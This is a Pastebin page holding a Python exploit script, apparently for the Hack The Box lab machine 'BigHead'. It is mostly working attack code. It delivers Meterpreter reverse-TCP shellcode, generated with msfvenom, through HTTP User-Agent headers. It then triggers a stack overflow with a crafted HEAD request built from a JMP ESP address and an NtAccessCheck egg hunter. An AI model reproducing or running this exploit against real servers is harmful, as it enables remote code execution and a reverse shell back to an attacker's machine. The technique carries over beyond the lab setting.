Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from socket import socket, AF_INET, SOCK_STREAM
- import binascii
- import requests
- import time
- # reversing the code -> we enter the vulnerable code if
- # len(req) <= 219
- # s = "HEAD / HTTP/1.1\r\n\r\n"
- # print len(s)
- # 19
- # so we have 200 bytes
- # function4, leave at address: 0040194C
- # Egg hunter using NtAccessCheck
- # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
- #my $egghunter =
- #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- #"\x77\x30\x30\x74". # this is the marker/tag: w00t
- #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
- # egg hunter using NtDisplayString
- #my $egghunter =
- #"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
- #"w00t".
- #"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
- PWND = "\x50\x57\x4e\x44" # string "PWND"
- # NtAccessCheck
- egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
- egghunter += PWND
- egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
- # we have ESP pointing after EIP, and EAX pointing at the start of the buffer
- # !mona find -s "\xff\xe4" -m bHeadSvr.dll
- JMP_ESP = "\xF0\x12\x50\x62"
- #JMP_EAX = "\xF2\x12\x50\x62"
- # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=process -f python -b '\x00\x0a\x0d\xff' -v shellcode
- # 368 bytes
- egg = PWND + PWND
- shellcode = egg
- shellcode += "\xd9\xc2\xd9\x74\x24\xf4\xba\x8a\x1f\x9e\x85\x5f"
- shellcode += "\x31\xc9\xb1\x56\x31\x57\x18\x83\xc7\x04\x03\x57"
- shellcode += "\x9e\xfd\x6b\x79\x76\x83\x94\x82\x86\xe4\x1d\x67"
- shellcode += "\xb7\x24\x79\xe3\xe7\x94\x09\xa1\x0b\x5e\x5f\x52"
- shellcode += "\x98\x12\x48\x55\x29\x98\xae\x58\xaa\xb1\x93\xfb"
- shellcode += "\x28\xc8\xc7\xdb\x11\x03\x1a\x1d\x56\x7e\xd7\x4f"
- shellcode += "\x0f\xf4\x4a\x60\x24\x40\x57\x0b\x76\x44\xdf\xe8"
- shellcode += "\xce\x67\xce\xbe\x45\x3e\xd0\x41\x8a\x4a\x59\x5a"
- shellcode += "\xcf\x77\x13\xd1\x3b\x03\xa2\x33\x72\xec\x09\x7a"
- shellcode += "\xbb\x1f\x53\xba\x7b\xc0\x26\xb2\x78\x7d\x31\x01"
- shellcode += "\x03\x59\xb4\x92\xa3\x2a\x6e\x7f\x52\xfe\xe9\xf4"
- shellcode += "\x58\x4b\x7d\x52\x7c\x4a\x52\xe8\x78\xc7\x55\x3f"
- shellcode += "\x09\x93\x71\x9b\x52\x47\x1b\xba\x3e\x26\x24\xdc"
- shellcode += "\xe1\x97\x80\x96\x0f\xc3\xb8\xf4\x47\x20\xf1\x06"
- shellcode += "\x97\x2e\x82\x75\xa5\xf1\x38\x12\x85\x7a\xe7\xe5"
- shellcode += "\x9c\x6d\x18\x39\x26\xfd\xe6\xba\x56\xd7\x2c\xee"
- shellcode += "\x06\x4f\x84\x8f\xcd\x8f\x29\x5a\x7b\x91\xbd\x6f"
- shellcode += "\x71\x9f\x39\x18\x87\x9f\x40\x63\x0e\x79\x12\xc3"
- shellcode += "\x40\xd6\xd3\xb3\x20\x86\xbb\xd9\xaf\xf9\xdc\xe1"
- shellcode += "\x7a\x92\x77\x0e\xd2\xca\xef\xb7\x7f\x80\x8e\x38"
- shellcode += "\xaa\xec\x91\xb3\x5e\x10\x5f\x34\x2b\x02\x88\x23"
- shellcode += "\xd3\xda\x49\xc6\xd3\xb0\x4d\x40\x84\x2c\x4c\xb5"
- shellcode += "\xe2\xf2\xaf\x90\x71\xf4\x50\x65\x43\x8e\x67\xf3"
- shellcode += "\xeb\xf8\x87\x13\xeb\xf8\xd1\x79\xeb\x90\x85\xd9"
- shellcode += "\xb8\x85\xc9\xf7\xad\x15\x5c\xf8\x87\xca\xf7\x90"
- shellcode += "\x25\x34\x3f\x3f\xd6\x13\x43\x38\x28\xe1\x6c\xe1"
- shellcode += "\x40\x19\x2d\x11\x90\x73\xad\x41\xf8\x88\x82\x6e"
- shellcode += "\xc8\x71\x09\x27\x40\xfb\xdc\x85\xf1\xfc\xf4\x48"
- shellcode += "\xaf\xfd\xfb\x50\x40\x87\x74\x66\xa1\x78\x9d\x03"
- shellcode += "\xa2\x78\xa1\x35\x9f\xae\x98\x43\xde\x72\x9f\x5c"
- shellcode += "\x55\xd6\xb6\xf6\x95\x44\xc8\xd2"
- host = "10.10.10.112"
- port = 80
- header_host = "dev.bighead.htb"
- #host = "127.0.0.1"
- #port = 8080
- #header_host = "127.0.0.1"
- print "[+] Stage 1: sending shellcode"
- h = {'User-Agent': shellcode, 'Content-Encoding': None, 'Accept-Encoding': None, 'Accept': None, 'Connection': 'close'}
- for i in range(0, 4):
- print "[*] req " + str(i) + " sent"
- #r = requests.post("http://" + header_host + "/", headers=h, data=shell)
- r = requests.get("http://" + header_host + "/", headers=h)
- print "> " + str(len(r.text))
- time.sleep(1)
- print "[+] Stage 2: exploit"
- EIP_OFFSET = 72/2
- BUF_FILL = 120/2
- buf = "\x41"*EIP_OFFSET
- buf += JMP_ESP
- buf += egghunter
- for i in range(0,1):
- sock = socket(AF_INET, SOCK_STREAM)
- sock.connect((host, port))
- sock.send("HEAD /" + binascii.hexlify(buf) + " HTTP/1.1\r\nHost: " + header_host + "\r\nConnection: close\r\n\r\n")
- print "[*] req " + str(i) + " sent"
- print "> " + sock.recv(1024)
- sock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement